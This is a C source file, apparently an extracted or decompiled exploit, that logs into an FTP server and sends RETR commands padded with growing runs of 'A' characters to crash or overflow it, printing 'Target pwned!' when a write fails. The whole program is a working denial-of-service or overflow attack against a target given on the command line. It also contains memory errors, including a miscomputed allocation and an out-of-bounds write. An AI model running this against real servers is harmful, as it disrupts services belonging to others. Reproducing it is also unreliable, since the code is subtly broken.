
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int server ;


 int AF_INET ;
 int EXIT_SUCCESS ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int bzero (struct sockaddr_in*,int) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int errno ;
 int free (char*) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 char* malloc (int) ;
 int memset (char*,char,int) ;
 int min (int,int) ;
 int perror (int *) ;
 int printf (char*,int ) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;
 int write (int,char*,int) ;

int
main (int argc, char *argv[])
{
    struct sockaddr_in server;
    int i, t, s;
    char *req, *buff;
    s = socket (AF_INET, SOCK_STREAM, 0);
    bzero (&server, sizeof (server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr (argv[1]);
    server.sin_port = htons (atoi (argv[2]));
    connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));
    req = malloc (sizeof (char) * (((strlen (argv[3]) - strlen (argv[4])) + min (strlen (argv[3]), strlen (argv[4])) + 8)));


    sprintf (req, "USER %s\xD\xA", argv[3]);
    write (s, req, strlen (req));
    sprintf (req, "PASS %s\xD\xA", argv[4]);
    write (s, req, strlen (req));
    free (req);
    for (i = 1; i <= 5; i++)
    {
        t = (sizeof (char) * 1000 * i);
        buff = malloc (t + 1);
        memset (buff, 'A', t);
        buff[t + 1] = '\0';
        req = malloc (t + 9);
        sprintf (req, "RETR %s\xD\xA", buff);
        if (write (s, req, strlen (req)) == -1)
        {
            perror (((void*)0));
            printf ("Target pwned!\n", errno);
        }
        free (req);
        free (buff);
        sleep (1);
    }
    close (s);
    return (EXIT_SUCCESS);
}
